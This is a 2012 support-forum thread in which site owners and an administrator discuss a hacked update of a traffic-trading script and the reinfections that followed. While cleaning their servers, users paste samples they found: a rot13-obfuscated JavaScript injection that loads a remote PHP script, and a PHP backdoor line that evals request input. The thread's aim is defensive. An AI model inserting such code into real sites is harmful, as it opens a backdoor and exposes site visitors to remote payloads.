Author Topic: build 43 / hacked again  (Read 60626 times)

0 Members and 2 Guests are viewing this topic.

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #45 on: February 29, 2012, 01:11:17 AM »
Guys I am waiting for kildoozer, just woke up after insane day yesterday(shitload of work).

When he arrives we will try to solve your issues or write here what to do.

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #46 on: February 29, 2012, 01:22:20 AM »
Ok kildoozer is already working on tool to lock tp files so they are not writable (more details soon dont worry all will work fine :) ).

It will be done today, then I will write instructions in forum on how to fix/lock your tp's!

Please stay tuned, finally we nailed this SOB.

Offline donedeal

  • Newbie
  • *
  • Posts: 43
    • View Profile
Re: build 43 / hacked again
« Reply #47 on: March 02, 2012, 03:00:22 PM »
Looking forward to something to help, im still infected with 47 sites thats making someone else money

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #48 on: March 02, 2012, 03:14:31 PM »
Please I know I ask MUCH but I ask you bit more of patience, kildoozer today inspected your servers and clean some files, tomorow he continues...he was again without damn electricity entire day! He also coded for a tiny bit new secure locking system hopefully tomorrow all is solved. When we clean your server we will deposit some $$$ to broker of your choice so U can buy some feed to compensate!!!

Once again, my apologies!

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #49 on: March 05, 2012, 08:01:58 AM »
For all who still have problems with hack here is solution:

http://forum.scriptpulse.com/index.php/topic,1484.0.html


Offline donedeal

  • Newbie
  • *
  • Posts: 43
    • View Profile
Re: build 43 / hacked again
« Reply #50 on: March 10, 2012, 11:44:17 AM »
8888<script888888 language="JavaScript"
type="text/javascript">function rot13(input){return
input.replace(/[a-zA-Z]/g,function(ch){return
String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg
fep=\"uggc://mvk.vz/!tybony/.cuc\"></fpevcg>"));888888</script88888

is this code yours or his? (i added 88888'8 in the code here to post)



Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #51 on: March 10, 2012, 12:01:14 PM »
I think its his, please follow instructions here: http://forum.scriptpulse.com/index.php/topic,1484.0.html

Offline donedeal

  • Newbie
  • *
  • Posts: 43
    • View Profile
Re: build 43 / hacked again
« Reply #52 on: March 10, 2012, 12:03:07 PM »
Just going through the server cleaning up this stuff. I also have a vulnerablilty to show you

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #53 on: March 10, 2012, 12:17:31 PM »
great, email me details to info@scriptpulse.com !

Offline Ska

  • Newbie
  • *
  • Posts: 10
    • View Profile
Re: build 43 / hacked again
« Reply #54 on: March 11, 2012, 11:22:37 PM »
it happend again :(
after cleaning it, locking it.
all files are back at 777 and tpupdater.php
was changed.

/stats/cache/auth.php
was found with the scan.php

if (isset($_REQUEST["auth"])) eval(stripslashes($_REQUEST["auth"]));
this was added to variables.php
« Last Edit: March 12, 2012, 04:14:52 AM by Yen Chan »

Offline donedeal

  • Newbie
  • *
  • Posts: 43
    • View Profile
Re: build 43 / hacked again
« Reply #55 on: March 11, 2012, 11:26:11 PM »
was finding these in the toplists tpl and html files, just a heads up to everyone to help clean up, last line of code

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #56 on: March 12, 2012, 06:51:58 AM »
If U cleaned and locked, speak with your host why files got replaced, its not in our domain :). Basically its wrong apache config or they use suphp so process (shell scripts) run under user.

Please consult your webhost and point them to changelog. If they have any questions info@scriptpulse.com

Offline donedeal

  • Newbie
  • *
  • Posts: 43
    • View Profile
Re: build 43 / hacked again
« Reply #57 on: March 14, 2012, 07:13:56 PM »
Quote
If U cleaned and locked, speak with your host why files got replaced, its not in our domain . Basically its wrong apache config or they use suphp so process (shell scripts) run under user.


The problem is the cleaning. No one has really posted a good cleaning process. Its hopping out of the TP folder. You can delete the whole tp folder and install from scratch, it comes back. The backdoors or scripts are still outside of the tp folder. Yes there are hacked tp files, but thats not the backdoor.

Lets not forget the original problem was the hacked update. This "Hack" that "keeps coming back" means it wasnt cleaned off the server properly. Yes we can "lock it". But it doesnt mean the "hack" is off your server. I dont believe for a second that this hack has anything to do with our original server security/configuration.

Once this tp updater hack gets on your server, your basically fucked. because the timestamps of the hacked files match on all domains on a server. Even on fresh tp installs. and by fresh, i mean deleting the tp folder completly AND toplist folders, its back a day later.

I have something for anyone to try... move your domain to a virgin server, install Smart thumbs, trade pulse from scratch, import your thumbs from another smart thumbs and a exported tradeslist, check your toplist codes before you import them, see your problem dissappear.

Has anyone tried this besides me and see it come back? I would like to hear this....

I know that your files where hacked and im not blaming you for that, but sorry, I have a tough time with your statment, this gives me the impression that your passing the cause of this problem to our servers config or hosting admin.

Im not trashing you, but I dont see any problem with TP being hacked when your server is actually clean. The problem is getting your server clean. A lock.php isnt going to take out the backdoor on your server.




Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: build 43 / hacked again
« Reply #58 on: March 15, 2012, 04:56:03 AM »
I agree 500% with you that lock.php is not FINAL solution, but lock.php is temp solution till your hoster cleans out shell scripts!

Servers are not our domain(we are doing SCRIPTS) so your hoster should clean it up and if they have any questions they are free to post here or over icq 169397168 or email info@scriptpulse.com.

This hack didn't come because of your server security, it came because of OUR server security when hacker got it and changed update files for cpl hrs :(.

I said your server security is bad in case shell exec scripts can change locked files.